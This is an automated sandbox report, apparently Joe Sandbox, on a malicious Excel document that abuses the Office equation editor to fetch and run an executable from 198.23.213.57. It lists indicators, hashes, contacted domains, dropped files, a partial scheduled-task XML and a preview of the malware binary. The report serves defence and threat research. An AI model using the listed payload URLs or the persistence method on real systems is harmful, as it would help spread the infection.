Kong 31->54 56 www.pistonpounder.com 31->56 58 www.20svip.com 31->58 60 System process connects to network (likely due to code injection or exploit) 31->60 35 cmmon32.exe 31->35         started        signatures15 process16 signatures17 78 Modifies the context of a thread in another process (thread injection) 35->78 80 Maps a DLL or memory area into another process 35->80 82 Tries to detect virtualization through RDTSC time measurements 35->82 38 cmd.exe 35->38         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Refno.191938.xlsx31%VirustotalBrowse
          Refno.191938.xlsx23%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.20svip.com/op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A==0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          www.kelurahanpatikidul.xyz/op9s/0%Avira URL Cloudsafe
          http://198.23.213.57/ohms.exe100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.streamxvid.com
          178.33.233.22
          truefalse
            unknown
            20svip.com
            43.226.23.112
            truetrue
              unknown
              www.pistonpounder.com
              unknown
              unknowntrue
                unknown
                www.20svip.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.20svip.com/op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A==true
                  • Avira URL Cloud: safe
                  unknown
                  www.kelurahanpatikidul.xyz/op9s/true
                  • Avira URL Cloud: safe
                  low
                  http://198.23.213.57/ohms.exetrue
                  • Avira URL Cloud: malware
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpfalse
                    high
                    http://www.windows.com/pctv.powershell.exe, 00000007.00000002.2155583236.0000000002BC0000.00000002.00000001.sdmpfalse
                      high
                      http://investor.msn.compowershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpfalse
                        high
                        http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpfalse
                          high
                          http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmpfalse
                            high
                            http://vbcity.com/forums/t/51894.aspxvbc.exefalse
                              high
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmpfalse
                                high
                                http://investor.msn.com/powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.%s.comPAvbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2153930847.0000000002521000.00000004.00000001.sdmpfalse
                                        high
                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpfalse
                                          high
                                          https://github.com/MrCylopsvbc.exefalse
                                            high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            198.23.213.57
                                            unknownUnited States
                                            36352AS-COLOCROSSINGUStrue
                                            43.226.23.112
                                            20svip.comHong Kong
                                            38197SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKongtrue

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:404009
                                            Start date:04.05.2021
                                            Start time:16:29:47
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 12m 26s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:Refno.191938.xlsx
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winXLSX@17/10@3/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 18.7% (good quality ratio 17.9%)
                                            • Quality average: 72.4%
                                            • Quality standard deviation: 28.1%
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xlsx
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • TCP Packets have been reduced to 100
                                            • Report size getting too big, too many NtCreateFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            16:40:59API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                            16:41:01API Interceptor94x Sleep call for process: vbc.exe modified
                                            16:41:05API Interceptor1x Sleep call for process: schtasks.exe modified
                                            16:41:05API Interceptor46x Sleep call for process: powershell.exe modified
                                            16:41:27API Interceptor229x Sleep call for process: cmmon32.exe modified
                                            16:42:04API Interceptor1x Sleep call for process: explorer.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            198.23.213.57RES Shipping documents SLO-0167.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/ohms.exe
                                            Quote - P75D53 - FATP- RF.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/ohms.exe
                                            Products List.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/fk.exe
                                            Biomed quotation.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/ohms.exe
                                            NEW ORDER PO.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/bob.exe
                                            Product list.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/lol.exe
                                            Product list.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/local.exe
                                            Balance Payment.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/razi.exe
                                            signed and stamped proforma invoice.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/god.exe
                                            New_Item.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/jesus.exe
                                            Order 2550619.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/rrr.exe
                                            New Inquries.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/GOD.exe
                                            New Inquries.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/GOD.exe
                                            payment Swift copy987656789PI.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/CFILEE.exe
                                            MT218 20 328.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/KASPA.exe
                                            productSpec_2141176 PHES.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/Ohms.exe
                                            Order List.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/fank.exe
                                            PO-4806125050.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/UGO.exe
                                            Order Comfirmation.xlsxGet hashmaliciousBrowse
                                            • 198.23.213.57/zina.exe
                                            43.226.23.11220-QAI-PRJ-0051-Appendix A-D.DOCx.exeGet hashmaliciousBrowse
                                            • www.20svip.com/rc5/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AS-COLOCROSSINGUStetup.exeGet hashmaliciousBrowse
                                            • 23.94.41.215
                                            sample04052021.xlsxGet hashmaliciousBrowse
                                            • 192.3.122.199
                                            Pending DHL Shipment Notification REF 04521.xlsxGet hashmaliciousBrowse
                                            • 198.23.207.82
                                            29f6b8ff_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            33075048_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            bf10a8ed_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            b6379798_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            ef2ccb56_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            57e4e9e9_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            49aa838c_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            b3976dff_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            cdce1cb3_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            faf01c9e_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            2044d4ec_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            df024c6e_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            87be565b_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            a856bf89_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            0a71c578_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            523eab29_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            99140c91_by_Libranalysis.dllGet hashmaliciousBrowse
                                            • 107.172.227.10
                                            SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong2021_02_25.exeGet hashmaliciousBrowse
                                            • 117.18.12.137
                                            Tx1q8DSCKe.exeGet hashmaliciousBrowse
                                            • 43.243.108.245
                                            210127.exeGet hashmaliciousBrowse
                                            • 117.18.12.137
                                            SecuriteInfo.com.Trojan.PackedNET.507.15470.exeGet hashmaliciousBrowse
                                            • 43.243.108.245
                                            sample2.docGet hashmaliciousBrowse
                                            • 210.56.52.6
                                            ucPCgX1NlH.exeGet hashmaliciousBrowse
                                            • 43.243.108.245
                                            form.docGet hashmaliciousBrowse
                                            • 210.56.52.6
                                            http://goodjobssolutions.com/mayo-clinic-nmk5w/WQDXUGGDH1memfhbzQba7kowTEW24A/Get hashmaliciousBrowse
                                            • 210.56.52.6
                                            http://bubbawatsongolf.com/_ARCHIVE/1kkkKgOZ0fekTnDr9Y221yQmAabJ8I5yGEFlTawlU5OuJtZyYlUmm9/Get hashmaliciousBrowse
                                            • 210.56.52.6
                                            https://j.mp/3nGS85BGet hashmaliciousBrowse
                                            • 202.146.220.226
                                            20-QAI-PRJ-0051-Appendix A-D.DOCx.exeGet hashmaliciousBrowse
                                            • 43.226.23.112
                                            cotizacio.exeGet hashmaliciousBrowse
                                            • 43.226.16.144
                                            http://gbghe.com/Get hashmaliciousBrowse
                                            • 103.230.242.112
                                            https://amazon.co.jp.yuake.cn/mobileGet hashmaliciousBrowse
                                            • 210.56.57.103
                                            Crack_BitRecover_PST_Password_R.exeGet hashmaliciousBrowse
                                            • 223.26.62.72
                                            17Order 945498.exeGet hashmaliciousBrowse
                                            • 202.146.219.27
                                            11Replace Doc.exeGet hashmaliciousBrowse
                                            • 202.146.219.27
                                            39Payment slip.exeGet hashmaliciousBrowse
                                            • 202.146.219.27
                                            82spoilt product.exeGet hashmaliciousBrowse
                                            • 202.146.219.27
                                            14updated items doc.exeGet hashmaliciousBrowse
                                            • 202.146.219.27

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:downloaded
                                            Size (bytes):734720
                                            Entropy (8bit):7.525234190780704
                                            Encrypted:false
                                            SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                            MD5:BA01DF16E4C876E078348FD4479A8FDF
                                            SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                            SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                            SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:low
                                            IE Cache URL:http://198.23.213.57/ohms.exe
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8078B401.emf
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                            Category:dropped
                                            Size (bytes):5376
                                            Entropy (8bit):5.042628525470356
                                            Encrypted:false
                                            SSDEEP:48:p2NoUunCa4ukzw+Lv6KbLSNRyBLf2qoCfVYIrxQ2PNrYJf66QpTIZTAo0zQnvBv6:c+Z0LbLSNR8L5oCNYdWN8M6QNcvBvPy
                                            MD5:6FE828081F388FA5A947F56C02700117
                                            SHA1:908CEAC45F0632017D658D0605AC48E683FC0FD5
                                            SHA-256:66B184623BA8775B4F92C1D50467BFDE8CA7DB9F5FA165446CE340FF06E9CB3F
                                            SHA-512:F1A5DDF7BE560A1D282B1FE2017CB6B914F5528E96B6348E813EB89F61F3CEB38373A1B260991C8B25BF0086F2E3C893DEB73B6106ECC645BB0E07898A293EEA
                                            Malicious:false
                                            Reputation:low
                                            Preview: ....l.............../...........?(..q... EMF............................V...........................fZ..U"..........................#...5...R...p...................................S.e.g.o.e. .U.I...................................................gu0..O.f.f.i.c.e.1.2.\.E.X.C.E.L.....t...gY.s........D.{j..........gu.{.u.e.u....T.......8{.u.T.w..u............./.w.3hw..{j..*...*.......v........H........u= .#..*......v........./.w..hw..{jx................Y.s................0.......ghu........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAC28400.emf
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                            Category:dropped
                                            Size (bytes):653280
                                            Entropy (8bit):2.8986289150517437
                                            Encrypted:false
                                            SSDEEP:3072:B34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:p4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                            MD5:43FE6C64B83EFAA9ED41B214135212DD
                                            SHA1:0DDBD7959A6821E49C0C916E087D1C689471E63B
                                            SHA-256:BA3556F0C1785899BFE45DC715CC7183EADA85AD2DA8708CE29446D759D74BFE
                                            SHA-512:DA54DC7B4C3549AAA3873B11E9F142ACC2FE252BB8B6D34BD7B25C59403BC54321388CCF451EEB305BB0ECC2BF83AA813B106F0D30454F459C7F55497AEC2585
                                            Malicious:false
                                            Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................x........N._x...p...........\....N._x...p... ....y.Zp...x... ............z.Z............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...p........2.Z.................{.Z............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                            C:\Users\user\AppData\Local\Temp\tmp4D08.tmp
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1626
                                            Entropy (8bit):5.166128249755591
                                            Encrypted:false
                                            SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3h
                                            MD5:35702C07F2155E8313D34F86C9BC4C01
                                            SHA1:BB10B2592BBB24D77D4B4E11A1F84C343D9B9CDC
                                            SHA-256:4E1409B1E80CFE5A5BDA6BC58175D8E580D4E289F06DDD441135F3F06D97A6D4
                                            SHA-512:C8A3C1F6C95DE2FFEB8F26458213DEE88382CBD2065DE9625D6B84CFF9ED64D22E94F4E5AE8129625737E76052248B9B99FB522474F702256E6EA80C94FB1446
                                            Malicious:true
                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C7KNZSSZ1DI8GVV6CBOE.temp
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.579570991262064
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqdqvsqvJCwoEz8hQCsMqdqvsEHyqvJCwor6zg1KrUHTZqO1lUVuIu:cyUoEz8yAHnor6zgUAZqOTIu
                                            MD5:FF71E5285457125B1C244AF15F69FE52
                                            SHA1:05462AF421A836630E0FE28FF18C114D1E853D1E
                                            SHA-256:DDA708ECD50125033B0B20D633E2C74F56541AB82CC0782D26F6CF15E96CDF48
                                            SHA-512:52A7A679DBD31C69B2CA9FAF6102651013CD9AB27957A6A452632FD7B90800B80B603BA1902AFAD3F90C31C0BA9569F559CEEA84C2A72023DF0D31174EBA97C8
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FGWHD4SVKSW8FSD4W3RI.temp
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.579570991262064
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqdqvsqvJCwoEz8hQCsMqdqvsEHyqvJCwor6zg1KrUHTZqO1lUVuIu:cyUoEz8yAHnor6zgUAZqOTIu
                                            MD5:FF71E5285457125B1C244AF15F69FE52
                                            SHA1:05462AF421A836630E0FE28FF18C114D1E853D1E
                                            SHA-256:DDA708ECD50125033B0B20D633E2C74F56541AB82CC0782D26F6CF15E96CDF48
                                            SHA-512:52A7A679DBD31C69B2CA9FAF6102651013CD9AB27957A6A452632FD7B90800B80B603BA1902AFAD3F90C31C0BA9569F559CEEA84C2A72023DF0D31174EBA97C8
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VS5R8C47SQIP1WVHNPQO.temp
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.579570991262064
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqdqvsqvJCwoEz8hQCsMqdqvsEHyqvJCwor6zg1KrUHTZqO1lUVuIu:cyUoEz8yAHnor6zgUAZqOTIu
                                            MD5:FF71E5285457125B1C244AF15F69FE52
                                            SHA1:05462AF421A836630E0FE28FF18C114D1E853D1E
                                            SHA-256:DDA708ECD50125033B0B20D633E2C74F56541AB82CC0782D26F6CF15E96CDF48
                                            SHA-512:52A7A679DBD31C69B2CA9FAF6102651013CD9AB27957A6A452632FD7B90800B80B603BA1902AFAD3F90C31C0BA9569F559CEEA84C2A72023DF0D31174EBA97C8
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):734720
                                            Entropy (8bit):7.525234190780704
                                            Encrypted:false
                                            SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                            MD5:BA01DF16E4C876E078348FD4479A8FDF
                                            SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                            SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                            SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
